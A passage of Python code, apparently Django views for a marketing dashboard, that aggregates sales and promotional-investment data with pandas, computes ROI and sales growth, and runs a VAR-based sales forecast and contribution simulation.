df4 = Sort_Dataframeby_Month(df=df4, monthcolumnname='month')
investment_month = df4['month'].values.tolist()
investment_Amount = df4['value'].values.tolist()
# investment for promotion type chart3
df5 = df1[['month', 'date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df5 = pd.melt(df5, id_vars=['date', 'month'], var_name='Investment_Types', value_name='value')
df5 = df5.groupby(['month', 'Investment_Types'])['value'].sum().reset_index()
df5 = Sort_Dataframeby_Month(df=df5, monthcolumnname='month')
df5_1= df5[df5['Investment_Types'] == 'AandP']
investment_Amount_A_P = df5_1['value'].values.tolist()
investment_month_A_P = df5_1['month'].values.tolist()
df5_2 = df5[df5['Investment_Types'] == 'Consumer_Promotion']
investment_Amount_Consumer_Promotion = df5_2['value'].values.tolist()
df5_3 = df5[df5['Investment_Types'] == 'Display_Only']
investment_Amount_Display_Only = df5_3['value'].values.tolist()
df5_4 = df5[df5['Investment_Types'] == 'Distributor_Margins']
investment_Amount_Distributor_Margins = df5_4['value'].values.tolist()
df5_5 = df5[df5['Investment_Types'] == 'JBP']
investment_Amount_JBP = df5_5['value'].values.tolist()
df5_6 = df5[df5['Investment_Types'] == 'Loyalty_Schemes']
investment_Amount_Loyalty_Schemes = df5_6['value'].values.tolist()
df5_7 = df5[df5['Investment_Types'] == 'Search_Only']
investment_Amount_Search_Only = df5_7['value'].values.tolist()
df5_8 = df5[df5['Investment_Types'] == 'Trade_Promotion']
investment_Amount_Trade_Promotion = df5_8['value'].values.tolist()
df5_9 = df5[df5['Investment_Types'] == 'Video']
investment_Amount_Video = df5_9['value'].values.tolist()
df5_10 = df5[df5['Investment_Types'] == 'facebook']
investment_Amount_facebook = df5_10['value'].values.tolist()
df5_11 = df5[df5['Investment_Types'] == 'instagram']
investment_Amount_instagram = df5_11['value'].values.tolist()
df5_12 = df5[df5['Investment_Types'] == 'messenger']
investment_Amount_messenger = df5_12['value'].values.tolist()
# Total investment for thr year chart4
if request.method == "POST":
df7 = df1.groupby(['date','month','bigc'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8 = df7[['month', 'date','bigc','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8 = pd.melt(df8, id_vars=['date', 'month','Sales','bigc'], var_name='Investment_Types', value_name='value')
df8 = df8.groupby(['date','month','bigc','Sales'])['value'].sum().reset_index()
df8['ROI'] = df8['Sales']/(df8['value'])
ROI_value = df8['ROI'].values.tolist()
ROI_month = df8['month'].values.tolist()
else:
df7 = df1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8 = df7[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8 = pd.melt(df8, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df8 = df8.groupby(['date','month','Sales'])['value'].sum().reset_index()
df8['ROI'] = df8['Sales']/(df8['value'])
ROI_value = df8['ROI'].values.tolist()
ROI_month = df8['month'].values.tolist()
# ROI for promotion types chart5
if request.method == "POST":
df13 = df1_1.groupby(['year','month','bigc'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df13 = df13[['month', 'year','bigc','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df13 = pd.melt(df13, id_vars=['year', 'month','Sales','bigc'], var_name='Investment_Types', value_name='value')
df13=df13[df13!=0].dropna()
df13['ROI'] = df13['Sales']/(df13['value'])
ROI_Investment_value = df13['ROI'].values.tolist()
ROI_Investment_Types = df13['Investment_Types'].values.tolist()
else:
df13 = df1_1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df13 = df13[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df13 = pd.melt(df13, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df13=df13[df13!=0].dropna()
df13['ROI'] = df13['Sales']/(df13['value'])
ROI_Investment_value = df13['ROI'].values.tolist()
ROI_Investment_Types = df13['Investment_Types'].values.tolist()
# get values for cart1 (Total sales)
total_sales_cart = df1_1['Sales'].sum()/1000000
total_sales_cart = round(total_sales_cart, 2)
# get values for cart2 (Total investments)
df3_1 = df1_1[['date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins', 'Loyalty_Schemes',
'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df3_1 = pd.melt(df3_1, id_vars=['date'], var_name='Investment_Types', value_name='value')
df3_1 = df3_1.groupby(['date'])['value'].sum().reset_index()
df3_1['Date'] = pd.to_datetime(df3_1['date'])
investment_Amount_cart = df3_1['value'].sum()/1000000
investment_Amount_cart=round(investment_Amount_cart, 2)
#get values for cart3 (Sales/investments)
if request.method == "POST":
df7_1 = df1_1.groupby(['date','month','bigc'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8_1 = df7_1[['month', 'date','bigc','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8_1 = pd.melt(df8_1, id_vars=['date', 'month','Sales','bigc'], var_name='Investment_Types', value_name='value')
df8_1 = df8_1.groupby(['date','month','bigc','Sales'])['value'].sum().reset_index()
df8_1['ROI'] = df8_1['Sales']/(df8_1['value'])
ROI_value_cart = round(df8_1['ROI'].sum(),4)
else:
df7_1 = df1_1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8_1 = df7_1[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8_1 = pd.melt(df8_1, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df8_1 = df8_1.groupby(['date','month','Sales'])['value'].sum().reset_index()
df8_1['ROI'] = df8_1['Sales']/(df8_1['value'])
ROI_value_cart = round(df8_1['ROI'].sum(),4)
#pass variables to html pages
context = {'yearf':yearf,'monthf':monthf,'bigcf':bigcf,'total_sales_cart': total_sales_cart, 'investment_Amount_cart':investment_Amount_cart
,'Sale_Date': Sale_Date, 'Sale_Amount': Sale_Amount,'years':years,'months':months,'bigcs':bigcs
,'investment_Amount':investment_Amount,'investment_month':investment_month
,'investment_Amount_A_P':investment_Amount_A_P,'investment_month_A_P':investment_month_A_P
,'investment_Amount_Consumer_Promotion':investment_Amount_Consumer_Promotion
,'investment_Amount_Display_Only':investment_Amount_Display_Only
,'investment_Amount_Distributor_Margins':investment_Amount_Distributor_Margins
,'investment_Amount_JBP':investment_Amount_JBP
,'investment_Amount_Loyalty_Schemes':investment_Amount_Loyalty_Schemes
,'investment_Amount_Search_Only':investment_Amount_Search_Only
,'investment_Amount_Trade_Promotion':investment_Amount_Trade_Promotion
,'investment_Amount_Video':investment_Amount_Video
,'investment_Amount_facebook':investment_Amount_facebook
,'investment_Amount_instagram':investment_Amount_instagram
,'investment_Amount_messenger':investment_Amount_messenger
,'investment_Amount_Consumer_Promotion':investment_Amount_Consumer_Promotion
,'ROI_value':ROI_value,'ROI_month':ROI_month,'ROI_value_cart':ROI_value_cart
,'ROI_Investment_value':ROI_Investment_value,'ROI_Investment_Types':ROI_Investment_Types
}
#get values for cart4 (Sales growth)
#get previous month
if request.method == "POST":
current_month = list(calendar.month_abbr).index(monthf)
previous_month = current_month-1
previous_month_abb = calendar.month_abbr[previous_month]
current_year = yearf
if previous_month == 0:
previous_month = 12
previous_month_abb = calendar.month_abbr[previous_month]
current_year = int(yearf)-1
current_year = str(current_year)
df_total_sales_for_previous_month = df[(df.bigc == bigcf)&(df.year == current_year)&(df.month == previous_month_abb)]
previous_total_sales = df_total_sales_for_previous_month['Sales'].sum()/1000000
sales_growth_cart = (total_sales_cart - previous_total_sales)/previous_total_sales*100
sales_growth_cart = round(sales_growth_cart, 2)
context.update({'sales_growth_cart': sales_growth_cart,'previous_month_abb':previous_month_abb })
else:
pass
return render(request, 'home.html', context)
def brand(request):
years = cd_year()
months = cd_month()
bigcs = cd_bigc()
Fbrands = cd_FoodBrands()
Bbrands = cd_BeveragesBrands()
HCbrands = cd_HomeProductsBrands()
SCbrands = cd_SelfCareBrands()
#get values from filter
yearf = request.POST.get('year')
monthf = request.POST.get('month')
bigcf = request.POST.get('bigc')
branf = request.POST.get('brand')
# filter data frame
if request.method == "POST":
df = SummarydataframeCreation()
df1 = df[(df.bigc == bigcf)&(df.Brand_name == branf)&(df.year == yearf)]
df1_1 = df[(df.bigc == bigcf)&(df.Brand_name == branf)&(df.year == yearf)&(df.month == monthf)]
else:
df = SummarydataframeCreation()
df = df.sort_values(by='date')
a = df['year'].iloc[-1]
b = df['month'].iloc[-1]
df1 = df[(df.year == a)]
df1_1 = df[(df.year == a)&(df.month == b)]
# Monthly sales chart1
df2 = df1.groupby('month', as_index=False).agg({"Sales": "sum"})
df2 = Sort_Dataframeby_Month(df=df2, monthcolumnname='month')
Sale_Date = df2['month'].values.tolist()
Sale_Amount = df2['Sales'].values.tolist()
# monthly investment chart2
df4 = df1[['month', 'date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df4 = pd.melt(df4, id_vars=['date', 'month'], var_name='Investment_Types', value_name='value')
df4 = df4.groupby(['month','date'])['value'].sum().reset_index()
df4 = Sort_Dataframeby_Month(df=df4, monthcolumnname='month')
investment_month = df4['month'].values.tolist()
investment_Amount = df4['value'].values.tolist()
# investment for promotion type chart3
df5 = df1[['month', 'date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df5 = pd.melt(df5, id_vars=['date', 'month'], var_name='Investment_Types', value_name='value')
df5 = df5.groupby(['month', 'Investment_Types'])['value'].sum().reset_index()
df5 = Sort_Dataframeby_Month(df=df5, monthcolumnname='month')
df5_1= df5[df5['Investment_Types'] == 'AandP']
investment_Amount_A_P = df5_1['value'].values.tolist()
investment_month_A_P = df5_1['month'].values.tolist()
df5_2 = df5[df5['Investment_Types'] == 'Consumer_Promotion']
investment_Amount_Consumer_Promotion = df5_2['value'].values.tolist()
df5_3 = df5[df5['Investment_Types'] == 'Display_Only']
investment_Amount_Display_Only = df5_3['value'].values.tolist()
df5_4 = df5[df5['Investment_Types'] == 'Distributor_Margins']
investment_Amount_Distributor_Margins = df5_4['value'].values.tolist()
df5_5 = df5[df5['Investment_Types'] == 'JBP']
investment_Amount_JBP = df5_5['value'].values.tolist()
df5_6 = df5[df5['Investment_Types'] == 'Loyalty_Schemes']
investment_Amount_Loyalty_Schemes = df5_6['value'].values.tolist()
df5_7 = df5[df5['Investment_Types'] == 'Search_Only']
investment_Amount_Search_Only = df5_7['value'].values.tolist()
df5_8 = df5[df5['Investment_Types'] == 'Trade_Promotion']
investment_Amount_Trade_Promotion = df5_8['value'].values.tolist()
df5_9 = df5[df5['Investment_Types'] == 'Video']
investment_Amount_Video = df5_9['value'].values.tolist()
df5_10 = df5[df5['Investment_Types'] == 'facebook']
investment_Amount_facebook = df5_10['value'].values.tolist()
df5_11 = df5[df5['Investment_Types'] == 'instagram']
investment_Amount_instagram = df5_11['value'].values.tolist()
df5_12 = df5[df5['Investment_Types'] == 'messenger']
investment_Amount_messenger = df5_12['value'].values.tolist()
# Total sales/ total investments chart 4
if request.method == "POST":
df6 = df1[['month', 'date','bigc','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df6 = pd.melt(df6, id_vars=['date', 'month','bigc','Sales'], var_name='Investment_Types', value_name='value')
df6 = df6.groupby(['date','month','bigc','Sales'])['value'].sum().reset_index()
df6['ROI'] = df6['Sales']/(df6['value'])
ROI_value = df6['ROI'].values.tolist()
ROI_month = df6['month'].values.tolist()
else:
df7 = df1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8 = df7[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8 = pd.melt(df8, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df8 = df8.groupby(['date','month','Sales'])['value'].sum().reset_index()
df8['ROI'] = df8['Sales']/(df8['value'])
ROI_value = df8['ROI'].values.tolist()
ROI_month = df8['month'].values.tolist()
# ROI for promotion types chart5
if request.method == "POST":
df13 = df1_1.groupby(['year','month','Brand_name'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df13 = df13[['month', 'year','Brand_name','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df13 = pd.melt(df13, id_vars=['year', 'month','Sales','Brand_name'], var_name='Investment_Types', value_name='value')
df13=df13[df13!=0].dropna()
df13['ROI'] = df13['Sales']/(df13['value'])
ROI_Investment_value = df13['ROI'].values.tolist()
ROI_Investment_Types = df13['Investment_Types'].values.tolist()
else:
df13 = df1_1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df13 = df13[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df13 = pd.melt(df13, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df13=df13[df13!=0].dropna()
df13['ROI'] = df13['Sales']/(df13['value'])
ROI_Investment_value = df13['ROI'].values.tolist()
ROI_Investment_Types = df13['Investment_Types'].values.tolist()
# ROI with contribution
# NoMonths=3
# bigcf ='Foods'
# brandf ='Brd00001'
# dfprep=DataPreprocessing(bigcf,brandf)
# df2,seconddiff,finaldf=test2(dfprep)
# results=VARmodel(df2)
# dfe_forecast=forecastData(results,df2,NoMonths,dfprep)
# invertsale1=invert_transformation(dfprep,df2,second_diff=seconddiff)
# invertsale1=np.exp(invertsale1)
# invertSale=invert_transformation(dfprep,dfe_forecast,second_diff=seconddiff)
# invertSale=np.exp(invertSale)
# #invert sale has only forecast data
# #finaldf has the actual data
# #appending the both dataframes togather to chart 1
# #takes only last 12 rows for the plot as in line 146
# fulldfForecast1=finaldf.append(invertSale)
# #keeping a copy for later purpose
# fulldfForecast1_2=fulldfForecast1.copy()
# fulldfForecast1['date'] = fulldfForecast1.index
# fulldfForecast1['date']=fulldfForecast1['date'].dt.strftime('%Y/%b/%d')
# fulldfForecast1['Sales2']=fulldfForecast1['Sales']
# fulldfForecast1=fulldfForecast1.tail(12)
# A=fulldfForecast1.iloc[:-NoMonths]
# A['Date']=A.index
# A['Date']=A['Date'].dt.strftime('%Y/%b/%d')
# B=fulldfForecast1.tail(NoMonths)
# B['Date']=B.index
# B['Date']=B['Date'].dt.strftime('%Y/%b/%d')
# Sale_Date = fulldfForecast1['date'].values.tolist()
# Sale_Amount =fulldfForecast1['Sales'].values.tolist()
# Sale_AmountP =fulldfForecast1['Sales2'].values.tolist()
# Sale_Amount1 =A['Sales'].values.tolist()
# Sale_Amount2 =B['Sales'].values.tolist()
# Sale_Date1 = A['Date'].values.tolist()
# Sale_Date2 = B['Date'].values.tolist()
# #contribution chart
# x=fulldfForecast1_2.shape[0]
# elasticity=impulseResponse(results,x,fulldfForecast1_2)
# contribution=Contribution(elasticity,fulldfForecast1_2)
# contribution2=contribution.copy()
# df_tt=ROI(contribution2,elasticity,3,2019,"Jan")
# Investment_type=df_tt['Investment Type'].values.tolist()
# ROI1=df_tt['ROI'].values.tolist()
# get values for cart1 (total sales)
total_sales_cart = df1_1['Sales'].sum()/1000000
total_sales_cart = round(total_sales_cart, 2)
# get values for cart2 (total investment)
df3_1 = df1_1[['date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins', 'Loyalty_Schemes',
'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df3_1 = pd.melt(df3_1, id_vars=['date'], var_name='Investment_Types', value_name='value')
df3_1 = df3_1.groupby(['date'])['value'].sum().reset_index()
df3_1['Date'] = pd.to_datetime(df3_1['date'])
investment_Amount_cart = df3_1['value'].sum()/1000000
investment_Amount_cart=round(investment_Amount_cart, 2)
#get values for cart3 (total sales/ total investments)
if request.method == "POST":
df6_1 = df1_1[['month', 'date','bigc','Brand_name','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df6_1 = pd.melt(df6_1, id_vars=['date', 'month','bigc','Brand_name','Sales'], var_name='Investment_Types', value_name='value')
df6_1 = df6_1.groupby(['date','month','bigc','Brand_name','Sales'])['value'].sum().reset_index()
df6_1['ROI'] = df6_1['Sales']/(df6_1['value'])
ROI_value_cart = round(df6_1['ROI'].sum(),4)
else:
df6_1 = df1_1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8_1 = df6_1[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8_1 = pd.melt(df8_1, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df8_1 = df8_1.groupby(['date','month','Sales'])['value'].sum().reset_index()
df8_1['ROI'] = df8_1['Sales']/(df8_1['value'])
ROI_value_cart = round(df8_1['ROI'].sum(),4)
context = {'years':years,'months':months,'bigcs':bigcs,
'Fbrands':Fbrands,'Bbrands':Bbrands,'HCbrands':HCbrands,'SCbrands':SCbrands,
'yearf':yearf, 'monthf':monthf,'bigcf':bigcf,'brandf':branf,
'Sale_Date':Sale_Date ,'Sale_Amount':Sale_Amount,
'investment_Amount':investment_Amount, 'investment_month':investment_month,
'investment_Amount_A_P':investment_Amount_A_P,'investment_month_A_P':investment_month_A_P
,'investment_Amount_Consumer_Promotion':investment_Amount_Consumer_Promotion
,'investment_Amount_Display_Only':investment_Amount_Display_Only
,'investment_Amount_Distributor_Margins':investment_Amount_Distributor_Margins
,'investment_Amount_JBP':investment_Amount_JBP
,'investment_Amount_Loyalty_Schemes':investment_Amount_Loyalty_Schemes
,'investment_Amount_Search_Only':investment_Amount_Search_Only
,'investment_Amount_Trade_Promotion':investment_Amount_Trade_Promotion
,'investment_Amount_Video':investment_Amount_Video
,'investment_Amount_facebook':investment_Amount_facebook
,'investment_Amount_instagram':investment_Amount_instagram
,'investment_Amount_messenger':investment_Amount_messenger
,'investment_Amount_Consumer_Promotion':investment_Amount_Consumer_Promotion
,'total_sales_cart': total_sales_cart,'investment_Amount_cart':investment_Amount_cart,
'ROI_value':ROI_value,'ROI_month':ROI_month, 'ROI_value_cart':ROI_value_cart
,'ROI_Investment_value':ROI_Investment_value,'ROI_Investment_Types':ROI_Investment_Types
# ,'Investment_type':Investment_type,'ROI1':ROI1
}
#get values for cart4 (sales growth)
#get previous month
if request.method == "POST":
current_month = list(calendar.month_abbr).index(monthf)
previous_month = current_month-1
previous_month_abb = calendar.month_abbr[previous_month]
current_year = yearf
if previous_month == 0:
previous_month = 12
previous_month_abb = calendar.month_abbr[previous_month]
current_year = int(yearf)-1
current_year = str(current_year)
df_total_sales_for_previous_month = df[(df.bigc == bigcf)&(df.Brand_name == branf)&(df.year == current_year)&(df.month == previous_month_abb)]
previous_total_sales = df_total_sales_for_previous_month['Sales'].sum()/1000000
sales_growth_cart = (total_sales_cart - previous_total_sales)/previous_total_sales *100
sales_growth_cart = round(sales_growth_cart, 2)
context.update({'sales_growth_cart': sales_growth_cart,'previous_month_abb':previous_month_abb })
else:
pass
return render(request,'brand.html',context)
def predict(request):
years = cd_year()
months = cd_month()
bigcs = cd_bigc()
brands = cd_brands()
Fbrands = cd_FoodBrands()
Bbrands = cd_BeveragesBrands()
HCbrands = cd_HomeProductsBrands()
SCbrands = cd_SelfCareBrands()
#get values from filter
yearf = request.POST.get('year')
monthf = request.POST.get('month')
bigcf = request.POST.get('bigc')
brandf = request.POST.get('brand')
pyearf=request.POST.get('pyear')
#slider1 = request.POST.get('range1')
print("++++++++++++++++++++++Hello world+++++++++++++++++++++++++++++")
print(bigcf)
if request.method == "POST":
NoMonths= int(pyearf)
else:
NoMonths=1
bigcf ='Foods'
brandf ='Brd00001'
dfprep=DataPreprocessing(bigcf,brandf)
df2,seconddiff,finaldf=test2(dfprep)
results=VARmodel(df2)
dfe_forecast=forecastData(results,df2,NoMonths,dfprep)
invertsale1=invert_transformation(finaldf,df2,second_diff=seconddiff)
invertsale1=np.exp(invertsale1)
invertSale=invert_transformation(finaldf,dfe_forecast,second_diff=seconddiff)
invertSale=np.exp(invertSale)
#invert sale has only forecast data
#finaldf has the actual data
#appending the both dataframes togather to chart 1
#takes only last 12 rows for the plot as in line 146
fulldfForecast1=finaldf.append(invertSale)
print("Checking columns=========================")
#keeping a copy for later purpose
fulldfForecast1_2=fulldfForecast1.copy()
print(fulldfForecast1_2.columns)
fulldfForecast1['date'] = fulldfForecast1.index
fulldfForecast1['date']=fulldfForecast1['date'].dt.strftime('%Y/%b/%d')
fulldfForecast1['Sales2']=fulldfForecast1['Sales']
fulldfForecast1=fulldfForecast1.tail(12)
A=fulldfForecast1.iloc[:-NoMonths]
A['Date']=A.index
A['Date']=A['Date'].dt.strftime('%Y/%b/%d')
B=fulldfForecast1.tail(NoMonths)
B['Date']=B.index
B['Date']=B['Date'].dt.strftime('%Y/%b/%d')
Sale_Date = fulldfForecast1['date'].values.tolist()
Sale_Amount =fulldfForecast1['Sales'].values.tolist()
z=fulldfForecast1.Sales.tail(NoMonths)
Sale_AmountP =fulldfForecast1['Sales2'].values.tolist()
#p1=Sale_AmountP[0]
#p2=Sale_AmountP[1]
#p3=Sale_AmountP[2]
Sale_Amount1 =A['Sales'].values.tolist()
Sale_Amount2 =B['Sales'].values.tolist()
Sale_Date1 = A['Date'].values.tolist()
Sale_Date2 = B['Date'].values.tolist()
#contribution chart
x=fulldfForecast1_2.shape[0]
elasticity=impulseResponse(results,x,fulldfForecast1_2)
print("checking elasticity columns1------------")
print(elasticity.columns)
elasticity2=elasticity.copy()
contribution=Contribution(elasticity,fulldfForecast1_2)
contribution2=contribution.copy()
contribution=contribution.tail(NoMonths)
#tt=contributionVisual(contribution)
#creating the columnlist
#tl=tt.columns.tolist()
#removewords=['Date_Contribution']
#for word in list(removewords): # iterating on a copy since removing will mess things up
# if word in removewords:
# tl.remove(word)
#columnlist1=tl
#tt['Month']=tt['Date_Contribution'].dt.month_name()
#tt['Month1']=tt['Date_Contribution'].dt.strftime('%Y/%b/%d')
#Month=tt['Month'].values.tolist()
#Consumer_Promotion_Contribution=tt['Consumer_Promotion_Contribution'].values.tolist()
#Trade_Promotion_Contribution=tt['Trade_Promotion_Contribution'].values.tolist()
#AandP_Contribution=tt['AandP_Contribution'].values.tolist()
#JBP_Contribution=tt['JBP_Contribution'].values.tolist()
#Distributor_Margins_Contribution=tt['Distributor_Margins_Contribution'].values.tolist()
#Loyalty_Schemes_Contribution=tt['Loyalty_Schemes_Contribution'].values.tolist()
#Video_Contribution=tt['Video_Contribution'].values.tolist()
#facebook_Contribution=tt['facebook_Contribution'].values.tolist()
#instagram_Contribution=tt['instagram_Contribution'].values.tolist()
#messenger_Contribution=tt['messenger_Contribution'].values.tolist()
########### Simulation#################
#column list to show the slider bars
tl2=elasticity.columns.tolist()
tl2=[x for x in tl2 if x != "Sales"]
columnlist2=tl2
AandP =1 #request.POST.get('AandP')
AndP1=request.POST.get('AandP_input')
print("==========================================================================aaaaaaaaannnnnppppppp")
print(AndP1)
#AandP_input=int(AandP)
Consumer_Promotion =1 #request.POST.get('customRange2')
JBP =1 #request.POST.get('customRange4')
facebook =1 #request.POST.get('customRange8')
instagram =1 #request.POST.get('customRange9')
video =1 #request.POST.get('customRange10')
Search_Only=1#request.POST.get('customRange11')
Display_Only=1#request.POST.get('customRange12')
Distributor_Margins=1#request.POST.get('customRange6')
Loyalty_Schemes=1#request.POST.get('customRange7')
Trade_Promotion=1#request.POST.get('customRange5')
messenger=1#request.POST.get('customRange13')
li=['Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP','Distributor_Margins', 'Loyalty_Schemes', 'Video', 'facebook','Search_Only', 'instagram', 'messenger', 'Display_Only']
for i in elasticity.columns.values:
for j in li:
if i==j:
li.remove(i)
for col in li:
elasticity[col]=0
elasticity=elasticity.tail(3)
elasticity_T1=elasticity.head(1)
elasticity_T1=elasticity_T1.reset_index()
elasticity_T2=elasticity.iloc[1:]
elasticity_T2=elasticity_T2.head(1)
elasticity_T2=elasticity_T2.reset_index()
elasticity_T3=elasticity.tail(1)
elasticity_T3=elasticity_T3.reset_index()
df=finaldf['Sales'].tail(1)
Salestot=df.sum()
#Salestot2=invertSale['Sales'].head(1).sum()
#Salestot3=invertSale['Sales'].tail(1).sum()
st1=abs(Salestot+elasticity_T1['Search_Only']*Search_Only+elasticity_T1['facebook']*facebook+elasticity_T1['instagram']*instagram+elasticity_T1['Display_Only']*Display_Only+elasticity_T1['Distributor_Margins']*Distributor_Margins+elasticity_T1['JBP']*JBP+elasticity_T1['Loyalty_Schemes']*Loyalty_Schemes+elasticity_T1['Trade_Promotion']*Trade_Promotion+elasticity_T1['Consumer_Promotion']*Consumer_Promotion+elasticity_T1['Video']*video+elasticity_T1['AandP']*AandP*1000+elasticity_T1['messenger']*messenger)
st2=abs(st1+elasticity_T2['Search_Only']*Search_Only+elasticity_T2['facebook']*facebook+elasticity_T2['instagram']*instagram+elasticity_T2['Display_Only']*Display_Only+elasticity_T2['Distributor_Margins']*Distributor_Margins+elasticity_T2['JBP']*JBP+elasticity_T2['Loyalty_Schemes']*Loyalty_Schemes+elasticity_T2['Trade_Promotion']*Trade_Promotion+elasticity_T2['Consumer_Promotion']*Consumer_Promotion+elasticity_T2['Video']*video+elasticity_T2['AandP']*AandP*10000+elasticity_T2['messenger']*messenger)
st3=abs(st2+elasticity_T3['Search_Only']*Search_Only+elasticity_T3['facebook']*facebook+elasticity_T3['instagram']*instagram+elasticity_T3['Display_Only']*Display_Only+elasticity_T3['Distributor_Margins']*Distributor_Margins+elasticity_T3['JBP']*JBP+elasticity_T3['Loyalty_Schemes']*Loyalty_Schemes+elasticity_T3['Trade_Promotion']*Trade_Promotion+elasticity_T3['Consumer_Promotion']*Consumer_Promotion+elasticity_T3['Video']*video+elasticity_T3['AandP']*AandP*10000+elasticity_T3['messenger']*messenger)
dfT={'Sales':st1}
dfT=pd.DataFrame(dfT)
dfT2={'Sales':st2}
